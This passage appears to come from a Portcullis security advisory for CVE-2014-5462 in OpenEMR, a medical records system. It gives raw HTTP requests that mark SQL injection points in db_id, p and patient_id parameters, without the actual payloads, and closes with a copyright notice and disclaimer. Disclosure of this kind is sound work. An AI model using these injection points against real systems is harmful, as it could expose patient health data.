 form_i2subscriber_employer_country=USA&i3subscriber_DOB=0000-00-00&i3accept_assignment=FALSE&i3subscriber_city=Winterville&form_hipaa_mail=NO&form_allow_imm_info_share=NO&form_street=5&i3effective_date=0000-00-00&form_i1subscriber_state=AL&form_interpretter=5&i1subscriber_lname=boom&form_title=Mr.&i1subscriber_fname=boom&form_fname=Asd&form_i1subscriber_employer_state=AL&form_i1subscriber_relationship=self&form_i1subscriber_country=USA&form_i3subscriber_employer_state=AL&form_contact_relationship=5&form_mothersname=boom&i2group_number=5&form_em_state=AL&form_i3subscriber_country=USA&form_allow_patient_portal=NO&i2copay=5&i2policy_number=5&form_i2subscriber_sex=Female&i1accept_assignment=FALSE&i3subscriber_postal_code=SW1A+1AA&i2subscriber_ss=5&i1subscriber_mname=boom&form_pharmacy_id=0&i3subscriber_phone=5&form_phone_home=5&form_lname=Asd&mode=save&form_i2subscriber_country=USA&i2subscriber_employer=5&db_id=1<SQL Injection> &form_i1subscriber_employer_country=USA&form_d
 eceased_reason=5&form_i2subscriber_state=AL&form_city=Winterville&form_email=winter@example.com&i3subscriber_employer_street=5&form_genericval2=asd&i3group_number=5&form_em_street=5&form_genericval1=asd&form_language=armenian&i1provider=&i2provider=&form_em_city=Winterville&form_em_name=boom&i3subscriber_fname=boom&form_race=amer_ind_or_alaska_native&i1plan_name=boom&i3subscriber_employer_city=Winterville&form_pubpid=asd&form_mname=Asd&i2subscriber_employer_street=5&form_financial_review=0000-00-00+00%3a00%3a00&i3subscriber_mname=boom&i3provider=&i3subscriber_employer_postal_code=SW1A+1AA&form_country_code=USA&form_em_country=USA&i2subscriber_phone=5&i3policy_number=5&form_status=married&form_ss=asdasd&form_monthly_income=01&i1effective_date=0000-00-00&form_i2subscriber_relationship=self&i3plan_name=boom&i1subscriber_employer_street=5&i1subscriber_city=Winterville&form_allow_imm_reg_use=NO&form_drivers_license=asd&form_i3subscriber_employer_country=USA&form_em_postal_code=SW
 1A+1AA&form_hipaa_message=30&i1subscriber_employer_city=Winterville&i1subscriber_postal_code=SW1A+1AA&i3copay=5&i1copay=5&i3subscriber_street=5&i3policy_type=12&i1subscriber_street=5&form_vfc=eligible&form_i2subscriber_employer_state=AL&i2subscriber_street=5&form_guardiansname=boom&i1policy_number=5&i3subscriber_lname=boom&form_phone_contact=5&i2subscriber_employer_postal_code=SW1A+1AA&form_homeless=5&form_i1subscriber_sex=Female&form_i3subscriber_state=AL&form_referral_source=Patient&i2subscriber_fname=boom&i1subscriber_ss=5&form_providerID=1&form_state=AL&form_postal_code=SW1A+1AA&form_hipaa_allowsms=NO&i1subscriber_DOB=0000-00-00&i2subscriber_employer_city=Winterville&form_hipaa_allowemail=NO&form_DOB=1994-02-07&form_deceased_date=0000-00-00+00%3a00%3a00&i2effective_date=0000-00-00&i2subscriber_DOB=0000-00-00&i2subscriber_postal_code=SW1A+1AA&form_genericname2=asdasd&form_genericname1=asasd&i1group_number=5&i2subscriber_mname=boom&i2accept_assignment=FALSE&i1subscriber_em
 ployer=5&i3subscriber_ss=5&form_phone_cell=5&i2subscriber_lname=boom&form_ethnicity=hisp_or_latin&i1subscriber_phone=5&form_occupation=5&i3subscriber_employer=5&form_hipaa_voice=NO&form_allow_health_info_ex=NO&form_ref_providerID=1&i1policy_type=12&i1subscriber_employer_postal_code=SW1A+1AA&i2plan_name=boom&i2policy_type=12&form_hipaa_notice=NO&form_migrantseasonal=5&form_i3subscriber_relationship=self&form_i3subscriber_sex=Female&form_family_size=5&i2subscriber_city=Winterville&form_phone_biz=5&form_sex=Female
 Request 17
 GET /openemr/interface/fax/fax_dispatch_newpid.php?p=1<SQL Injection> HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6
 Connection: keep-alive
 Request 18
 GET /openemr/interface/patient_file/reminder/patient_reminders.php?mode=simple&patient_id=1<SQL Injection> HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: OpenEMR=ra3sfkvd85bjve6qjm9ouq3225
 Further details at:
 https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5462/
 Copyright:
 Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
 Disclaimer:
 The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.